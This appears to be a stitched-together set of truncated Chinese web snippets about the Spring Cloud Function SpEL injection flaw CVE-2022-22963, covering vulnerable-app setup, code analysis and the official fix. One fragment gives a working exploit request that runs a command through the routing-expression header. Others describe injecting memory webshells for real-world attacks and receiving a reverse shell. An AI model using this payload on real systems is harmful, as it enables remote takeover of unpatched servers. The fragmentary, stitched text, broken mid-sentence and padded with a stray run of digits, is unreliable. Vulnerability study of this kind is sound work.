\spring-cloud-function-3.1.6\spring-cloud-function-3.1.6\spring-cloud-function-samples\function-sample-pojo修改配置文件spring-cloud-function-3.1.6\spring-cloud-function-3.1.6\spring-cloud-function-samples\function-sample-pojo\src\main\resources\appliaction.properties添加 spring.cloud.function.definition:...
Spring Cloud Function SpEL RCE漏洞学习 一、概述 近期Spring Cloud Function修复了一个SpEL表达式注入漏洞,该漏洞CVE编号为CVE-2022-22963,漏洞等级为高危,目前POC/EXP已经公开。影响范围为:3.0.0.RELEASE <= Spring Cloud Function <= 3.2.2,目前网上已经有很多文章进行漏洞分析,作为JAVA代码审计的初学者,笔者也来...
spring.cloud.function.routing-expression这个header支持Spel语言语法。 官方修复方案 添加一个isViaHeader 为true时:headerEvalContext = SimpleEvaluationContext 为false时:evalContext = new StandardEvaluationContext 拓展思考 是不是所有StandardEvaluationContext,都是潜在受攻击面?如果能远程控制妥妥的RCE。保守起见应该换...
spring-cloud-function SpEL RCE Vultarget You can build it for youself. here is the source of the Vuln App Or you can use the release which built by cckuailong(Yh,it's me) java -jar function-sample-pojo-3.2.1.RELEASE.jar P.S. test with Java17 Poc POST /xxx HTTP/1.1 Host: test...
Spring Cloud Function 是基于Spring boot 的函数计算框架,支持基于SpEL的函数式动态路由。 漏洞复现和分析 测试版本:v3.2.2 新建Spring boot项目导入依赖 pom.xml <?xml version="1.0" encoding="UTF-8"?><project xmlns="http://maven.apache.org/POM/4.0.0" xmlns:xsi="http://www.w3.org/2001/XMLSche...
spring-cloud-function SpEL RCE, Vultarget & Poc. Contribute to cckuailong/spring-cloud-function-SpEL-RCE development by creating an account on GitHub.
在route中判断header头中是否有spring.cloud.function.routing-expression,随后调用FunctionFromExpression。 到FunctionFromExpression中,即调用Expression对传入的SPEL表达式进行解析,随后调用expression.getValue执行。 修复在修复版本中对header使用SimpleEvaluationContext进行安全处理。 参考https://github.com/spring-cloud/...
在Spring Cloud Function SpEL RCE细节公布后,分析的文章很多,这里不再对漏洞进行分析,一直以来的习惯就是对漏洞进行包装,Java中能RCE的漏洞尽量都注入冰蝎/哥斯拉/蚁剑内存马,而不是满足于简单的回显或一句话内存马,这样做的好处是大家在实战利用的过程中更加方便,提升效率。这篇文章记录了漏洞包装的过程中克服的一...
Spring Cloud Function 3.1.7 Spring Cloud Function 3.2.3 0x02 漏洞复现 (1)访问页面,默认页面是这样: (2)首先验证漏洞,直接刷新链接,然后抓包,然后发送post包: POST /functionRouter HTTP/1.1 Host: xxx:8080 spring.cloud.function.routing-expression: T(java.lang.Runtime).getRuntime().exec("ping xxx...
3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 成功收到反弹过来的shell 在监听中成功接受到了shell # 渗透测试# web安全# 漏洞挖掘# 漏洞复现 ...